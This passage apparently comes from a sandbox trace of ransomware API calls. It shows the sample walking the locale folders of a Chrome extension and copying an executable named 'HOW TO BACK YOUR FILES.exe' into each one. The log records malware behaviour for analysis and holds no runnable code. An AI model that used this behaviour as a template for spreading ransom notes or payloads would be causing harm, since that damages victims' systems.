ftCreationTime.dwLowDateTime=0x83624340, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d445860, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d445860, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.779] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.779] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.779] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh" [0104.780] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh" [0104.780] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.780] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.780] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.781] GetLastError () returned 0x0 [0104.781] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.781] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.781] CloseHandle (hObject=0x120) returned 1 [0104.781] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.781] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\zh\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8361ce10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d445860, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d445860, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.781] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.781] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.781] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi" [0104.781] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi" [0104.781] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.781] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.782] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.782] GetLastError () returned 0x0 [0104.782] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.782] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.782] CloseHandle (hObject=0x120) returned 1 [0104.783] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.783] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\vi\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x836158e0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d46b9c0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d46b9c0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.783] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.783] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.783] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk" [0104.783] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk" [0104.783] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.783] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.784] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.784] GetLastError () returned 0x0 [0104.784] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.784] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.784] CloseHandle (hObject=0x120) returned 1 [0104.784] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.784] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\uk\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x8360bca0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d491b20, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d491b20, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.785] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.785] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.785] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr" [0104.785] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr" [0104.785] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.785] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.786] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.786] GetLastError () returned 0x0 [0104.786] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.786] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.786] CloseHandle (hObject=0x120) returned 1 [0104.786] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.786] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\tr\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x835fd240, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d4b7c80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d4b7c80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.786] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.786] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.787] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th" [0104.787] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th" [0104.787] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.787] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.787] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.788] GetLastError () returned 0x0 [0104.788] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.788] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.788] CloseHandle (hObject=0x120) returned 1 [0104.788] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.788] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\th\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x835f5d10, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d4b7c80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d4b7c80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.788] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.788] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.788] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te" [0104.788] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te" [0104.788] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.789] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.789] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0104.789] GetLastError () returned 0x0 [0104.789] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0104.789] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0104.790] CloseHandle (hObject=0x120) returned 1 [0104.790] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0104.790] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\te\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2010, ftCreationTime.dwLowDateTime=0x835ec0d0, ftCreationTime.dwHighDateTime=0x1d2dd9e, ftLastAccessTime.dwLowDateTime=0x6d4b7c80, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x6d4b7c80, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0104.790] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0104.790] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0104.790] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta" [0104.790] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta" [0104.790] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0104.790] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Local Settings\\Application Data\\Google\\Chrome\\User Data\\Default\\Extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\local settings\\application data\\google\\chrome\\user data\\default\\extensions\\pkedcjkdefgpdelpbcmbmeomcjbeemfm\\5817.313.0.5_0\\_locales\\ta\\how to back your files.exe"), bFailIfExists=1) returned 0 [0104.791] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" 